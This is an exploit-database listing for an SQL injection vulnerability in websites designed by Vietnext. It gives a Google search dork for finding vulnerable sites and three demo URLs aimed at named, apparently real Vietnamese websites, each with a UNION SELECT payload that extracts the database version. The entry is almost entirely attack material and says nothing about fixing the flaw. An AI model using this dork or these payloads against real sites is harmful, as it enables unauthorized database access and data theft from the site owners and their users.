Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Vietnext | High | Remote | 2022-03-12 |
********************************************************* #Exploit Title: Vietnext - Sql Injection Vulnerability #Date: 2022-03-10 #Exploit Author: Behrouz Mansoori #Google Dork: "Designed by Vietnext" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Designed by Vietnext" ### Demo : http://lasxd.vn/?frame=tm_dv_detail&id=-28%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- http://daidongthanhmachine.com/?frame=product_detail&id=-199%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15-- http://www.gialap.vn/?frame=product_detail&id=-605%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************
Copyright ©2024 Exploitalert.